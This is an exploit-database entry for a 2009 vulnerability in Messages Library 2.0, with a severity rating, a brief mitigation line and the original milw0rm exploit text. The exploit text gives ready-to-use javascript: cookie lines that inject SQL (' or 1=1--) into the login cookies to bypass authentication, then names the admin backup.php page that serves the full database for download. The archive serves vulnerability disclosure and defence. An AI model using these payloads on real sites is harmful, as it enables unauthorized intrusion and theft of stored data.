header-logo
Suggest Exploit
vendor:
Messages Library
by:
Stack
7,5
CVSS
HIGH
Arbitrary Database Download
20
CWE
Product Name: Messages Library
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Messages Library 2.0 <= Arbitrary Database Download Vulnerability

Bypassing authentication with the given javascript code and then accessing the backup.php page to download the database.

Mitigation:

Ensure that authentication is properly implemented and that the backup.php page is not accessible without authentication.
Source

Exploit-DB raw data:

# Messages Library 2.0 <=  Arbitrary Database Download Vulnerability
########################################
#[*] Founded &  Exploited by : Stack
########################################
 
Bypass with
 
javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/";
javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/";
 
After Exec
 
http://localhost/sms/admin/backup.php
 
and you got the database download

# milw0rm.com [2009-07-01]